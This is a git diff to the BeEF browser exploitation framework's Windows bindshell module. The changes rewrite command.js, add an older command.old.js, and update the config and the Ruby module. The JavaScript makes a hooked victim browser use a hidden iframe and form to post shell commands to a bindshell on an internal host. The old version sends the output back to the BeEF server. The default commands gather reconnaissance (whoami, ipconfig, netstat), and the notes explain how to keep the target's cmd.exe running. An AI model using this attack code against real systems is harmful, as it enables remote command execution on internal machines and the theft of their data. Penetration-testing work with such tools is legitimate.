diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js
index dfc372848..7fbe8b05e 100644
--- a/modules/ipec/inter_protocol_win_bindshell/command.js
+++ b/modules/ipec/inter_protocol_win_bindshell/command.js
@@ -6,74 +6,41 @@
 
 beef.execute(function() {
 
-	var target_ip = "<%= @ip %>";
-	var target_port = "<%= @port %>";
-	var cmd = "<%= @cmd %>";
-	var timeout = "<%= @command_timeout %>";
-	var internal_counter = 0;
-
-	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
-
-	var iframe = document.createElement("iframe");
-	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
-	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
-	document.body.appendChild(iframe);
-
-	function do_submit(ip, port, content) {
-
-		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
-		var parent = window.location.href;
-
-		myform=document.createElement("form");
-		myform.setAttribute("name","data");
-		myform.setAttribute("method","post");
-		myform.setAttribute("enctype","multipart/form-data");
-		myform.setAttribute("action",action);
-		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
-	
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id",<%= @command_id %>);
-		myExt.setAttribute("name",<%= @command_id %>);
-		myExt.setAttribute("value",content);
-		myform.appendChild(myExt);
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id","endTag");
-		myExt.setAttribute("name","</div>");
-		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
-
-		myform.appendChild(myExt);
-		myform.submit();
+	// validate payload
+	try {
+		var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
 	}
 
-	function waituntilok() {
-
-		try {
-			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
-				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
-				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
-				document.body.removeChild(iframe);
-				return;
-			} else throw("command results haven't been returned yet");
-		} catch (e) {
-			internal_counter++;
-			if (internal_counter > timeout) {
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
-				document.body.removeChild(iframe);
-				return;
-			}
-			setTimeout(function() {waituntilok()},1000);
-		}
+	// validate target host
+	var rhost = "<%= @rhost %>";
+	if (!rhost) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
 	}
 
-	if (!target_port || !target_ip || isNaN(target_port)) {
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
-	} else if (target_port > 65535 || target_port < 0) {
+	// validate target port
+	var rport = "<%= @rport %>";
+	if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
-	} else {
-		do_submit(target_ip, target_port, cmd);
-		waituntilok();
+		return;
 	}
 
+	// validate timeout
+	var timeout = "<%= @timeout %>";
+	if (isNaN(timeout)) timeout = 30;
+
+	// send commands
+	var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit");
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent');
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(win_ipec_form_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout * 1000);
+
 });
 
diff --git a/modules/ipec/inter_protocol_win_bindshell/command.old.js b/modules/ipec/inter_protocol_win_bindshell/command.old.js
new file mode 100644
index 000000000..909637463
--- /dev/null
+++ b/modules/ipec/inter_protocol_win_bindshell/command.old.js
@@ -0,0 +1,86 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+// This is the old module which supports bi-directional communications for Firefox before version ~16
+beef.execute(function() {
+
+	var target_ip   = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var cmd         = "<%= @cmd %>";
+	var timeout     = "<%= @command_timeout %>";
+	var internal_counter = 0;
+
+	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
+
+	var iframe = document.createElement("iframe");
+	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
+	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+	document.body.appendChild(iframe);
+
+	function do_submit(ip, port, content) {
+
+		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
+		var parent = window.location.href;
+
+		myform=document.createElement("form");
+		myform.setAttribute("name","data");
+		myform.setAttribute("method","post");
+		myform.setAttribute("enctype","multipart/form-data");
+		myform.setAttribute("action",action);
+		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
+	
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id",<%= @command_id %>);
+		myExt.setAttribute("name",<%= @command_id %>);
+		myExt.setAttribute("value",content);
+		myform.appendChild(myExt);
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id","endTag");
+		myExt.setAttribute("name","</div>");
+		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
+
+		myform.appendChild(myExt);
+		myform.submit();
+	}
+
+	function waituntilok() {
+
+		try {
+			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
+				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
+				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
+				document.body.removeChild(iframe);
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+			internal_counter++;
+			if (internal_counter > timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
+				document.body.removeChild(iframe);
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	// validate target host
+	if (!target_ip) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
+	}
+
+	// validate target port
+	if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+		return;
+	}
+
+	// send commands
+	do_submit(target_ip, target_port, cmd);
+	waituntilok();
+
+});
+
diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml
index 1355edb2b..3240851df 100644
--- a/modules/ipec/inter_protocol_win_bindshell/config.yaml
+++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml
@@ -9,8 +9,8 @@ beef:
             enable: true
             category: "IPEC"
             name: "Bindshell (Windows)"
-            description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field. <br><br>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+            description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
             authors: ["bcoles", "wade"]
             target:
-                working: ["FF"]
-                not_working: ["C", "S", "O", "IE"]
+                working: ["FF", "C"]
+                not_working: ["S", "O", "IE"]
diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb
index ccb0d9b98..7be2302e3 100644
--- a/modules/ipec/inter_protocol_win_bindshell/module.rb
+++ b/modules/ipec/inter_protocol_win_bindshell/module.rb
@@ -4,67 +4,28 @@
 # See the file 'doc/COPYING' for copying permission
 #
 =begin
-[+] Summary:
-
-Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
-
-The command results are returned to the BeEF control panel.
-
-[+] Tested:
-
-o Working:
-	o Mozilla Firefox 4
-	o Mozilla Firefox 5
-
-o Not Working:
-	o Mozilla Firefox 5 with the NoScript extension
-	o Internet Explorer 8+
-	o Chrome 13
-	o Opera 11
-	o Safari 5
-
-[+] Notes:
-
-o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
-
-	o use the netcat persistent listen "-L" option rather than the listen "-l" option; or
-
-	o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
-
-o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
-
-	[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7}
-	SYSTEM rule:
-	Site LOCAL
-	Accept from LOCAL
-	Deny
-
-o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
-
-o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
-
-o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
+The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
+	- use the netcat persistent listen "-L" option rather than the listen "-l" option; or
+	- remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
 
+Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however.
 =end
 
 class Inter_protocol_win_bindshell < BeEF::Core::Command
   
   def self.options
     return [
-	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
-	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
-	{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
-	{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
+	{'name'=>'rhost',   'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
+	{'name'=>'rport',   'ui_label'=>'Target Port',    'value'=>'4444'},
+	{'name'=>'timeout', 'ui_label'=>'Timeout (s)',    'value'=>'30'},
+	{'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
     ]
   end
 
   def post_execute
     content = {}
     content['result'] = @datastore['result'] if not @datastore['result'].nil?
-    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
-    if content.empty?
-      content['fail'] = 'No data was returned.'
-    end
+    content['fail']   = @datastore['fail']   if not @datastore['fail'].nil?
     save content
   end
 end